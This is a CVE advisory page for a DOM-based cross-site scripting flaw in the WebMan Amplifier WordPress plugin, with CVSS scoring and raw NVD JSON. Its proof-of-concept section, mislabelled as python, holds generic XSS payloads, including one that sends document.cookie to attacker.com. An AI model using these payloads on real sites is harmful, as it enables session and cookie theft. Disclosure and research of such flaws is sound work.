Security Vulnerability Report
中文
CVE-2025-62757 CVSS 6.5 MEDIUM

CVE-2025-62757

Published: 2025-12-31 12:16:19
Last Modified: 2026-04-23 15:34:41

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebMan Design | Oliver Juhas WebMan Amplifier webman-amplifier allows DOM-Based XSS.This issue affects WebMan Amplifier: from n/a through <= 1.5.12.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WebMan Amplifier <= 1.5.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- DOM型XSS PoC for CVE-2025-62757 --> <!-- 攻击者构造的恶意URL示例 --> <script> // 模拟漏洞利用场景 const maliciousInput = '<img src=x onerror="alert(document.cookie)"> '; // 在实际漏洞中,以下代码会被插件执行 document.write(maliciousInput); // 漏洞点:未经过滤直接输出 </script> <!-- 实际利用URL格式示例 --> <!-- https://target-site.com/?search_term=<img src=x onerror=alert(document.domain)> --> <!-- 更隐蔽的payload --> <!-- <svg/onload=fetch('https://attacker.com/steal?c='+document.cookie)> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62757", "sourceIdentifier": "[email protected]", "published": "2025-12-31T12:16:18.740", "lastModified": "2026-04-23T15:34:41.190", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebMan Design | Oliver Juhas WebMan Amplifier webman-amplifier allows DOM-Based XSS.This issue affects WebMan Amplifier: from n/a through <= 1.5.12."}, {"lang": "es", "value": "Neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') vulnerabilidad en WebMan Design | Oliver Juhas WebMan Amplifier permite XSS basado en DOM. Este problema afecta a WebMan Amplifier: desde n/d hasta 1.5.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/webman-amplifier/vulnerability/wordpress-webman-amplifier-plugin-1-5-12-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}